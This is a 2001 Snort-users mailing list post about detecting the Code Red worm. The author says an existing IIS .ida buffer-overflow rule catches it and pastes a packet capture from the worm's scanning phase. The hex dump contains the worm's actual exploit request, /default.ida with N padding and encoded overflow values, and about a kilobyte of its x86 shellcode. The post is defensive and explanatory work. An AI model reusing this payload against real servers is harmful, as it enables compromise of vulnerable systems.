Snort mailing list archives
RE: code red worm
From: Steve Halligan <agent33 () geeksquad com>
Date: Mon, 30 Jul 2001 11:12:04 -0500
If I'm not mistaken, there is a rule to detect the worm. The worm attempts to exploit the Microsoft ida buffer overflow for which there has been a rule since June 19.
You are correct sir. Snort=way way ahead of the game on code red. It was detecting it before it existed. This is what it looks like in its scanning phase: #(1 - 720) [2001-07-19 13:37:57] [arachNIDS/552] WEB-IIS ISAPI .ida attempt IPv4: 208.135.72.10 -> xxx.xxx.xxx.227 hlen=5 TOS=0 dlen=1500 ID=1239 flags=0 offset=0 TTL=116 chksum=14626 TCP: port=1783 -> dport: 80 flags=***AP*** seq=3986198013 ack=1738783906 off=5 res=0 win=17520 urp=0 chksum=24758 Payload: length = 1414 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN 020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 0f0 : 4E 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 N.090.858.bd3.80 100 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 1.090.858.bd3.80 110 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 1.090.858.bd3.80 120 : 31 00 30 39 30 00 30 39 30 00 31 39 30 00 30 63 1.090.090.190.0c 130 : 33 00 30 30 33 00 62 30 30 00 33 31 62 00 33 66 3.003.b00.31b.3f 140 : 66 00 30 37 38 00 30 30 30 00 30 3D 61 20 20 48 f.078.000.0=a H 150 : 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 TTP/1.0..Content 160 : 2D 74 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A -type: text/xml. 170 : 48 4F 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F HOST:www.worm.co 180 : 6D 0A 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 m. Accept: */*.C 190 : 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 ontent-length: 3 1a0 : 35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 569 ....U....... 1b0 : 00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 .SVW............ 1c0 : CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 ........p....... 1d0 : E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF .......h........ 1e0 : FF 64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 .d......G.d.=... 1f0 : 00 E9 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE ..o.....`....... 200 : FF FF FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 ........h....... 210 : 85 F4 FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 .......X......w. 220 : 9B 0A 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 ......p......... 230 : 00 8B 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 ...X...........X 240 : FE FF FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 .....X......xu.. 250 : 85 58 FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 .X.........X...3 260 : C0 66 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B .f..=MZ......... 270 : 8D 58 FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 .X....Q<..X...3. 280 : 66 8B 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 f.....PE....y... 290 : 8B 95 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B ..X....B<..X.... 2a0 : 54 01 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B T.x..X.....T.... 2b0 : 85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D .T....H...X..... 2c0 : 4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E L.....L....:KERN 2d0 : 0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 ..3.....L....x.E 2e0 : 4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 L32.. .....X.... 2f0 : 8D 34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF .4.....T.....X.. 300 : FF 03 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF ..B ..L.....H... 310 : 00 00 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 ........H....... 320 : 8D 48 FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 .H.....L........ 330 : 4C FE FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF L.....T.....H... 340 : 3B 48 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B ;H.........L.... 350 : 02 8B 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 ...X....<.GetP.. 360 : A0 00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE ......L.......X. 370 : FF FF 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 ...|..rocA...... 380 : 8B 95 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE ..H.....H.....X. 390 : FF FF 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 ....T....H$3.f.. 3a0 : 0A 89 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 ...L.....T....Q. 3b0 : 8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF ..L....L....L... 3c0 : 8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE ..L.....L.....L. 3d0 : FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 ....L.....X..... 3e0 : 54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF T....H......L... 3f0 : 8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE ..L.....X.....p. 400 : FF FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD ................ 410 : F0 FE FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 .....G.d.......p 420 : FE FF FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF ....u..8.....L.. 430 : FF 01 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 .........L...... 440 : 89 8D 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 ..L.....h....... 450 : C0 0F 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 .........h...... 460 : 83 FA 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 ...u!..h........ 470 : 50 FF 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 P......;..CKCK.. 480 : 34 FE FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 4....*....h...Q. 490 : 95 34 FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 .4...R..p...;..C 4a0 : 4B 43 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF KCK..L.......... 4b0 : EB 0F 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF ....h........h.. 4c0 : FF 8B 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 ...h........t... 4d0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 ..h........h.... 4e0 : 53 FF FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 S.....h........h 4f0 : FE FF FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE ....M.........l. 500 : FF FF C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE ....L........... 510 : FF FF 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE ..h.E........... 520 : FF FF 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 ..[SS.......cx.. 530 : 8B 4D 08 8B 51 10 89 95 50 FE FF FF 83 BD 50 FE .M..Q...P.....P. 540 : FF FF 00 75 26 8B F4 6A 00 8D 85 4C FE FF FF 50 ...u&..j...L...P 550 : 8B 8D 68 FE FF FF 51 8B 55 08 8B 42 08 50 FF 95 ..h...Q.U..B.P.. 560 : 6C FE FF FF 3B F4 90 43 4B 43 4B 83 BD 50 FE FF l...;..CKCK..P.. 570 : FF 64 7D 5C 8B 8D 50 FE FF FF 83 C1 01 89 8D 50 .d}\..P........P 580 : FE FF FF 8B 95 50 .....P ---------------------------------------------------------------------------- -- _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- code red worm jaywhy (Jul 30)
- <Possible follow-ups>
- Re: code red worm Dr SuSE (Jul 30)
- RE: code red worm Steve Halligan (Jul 30)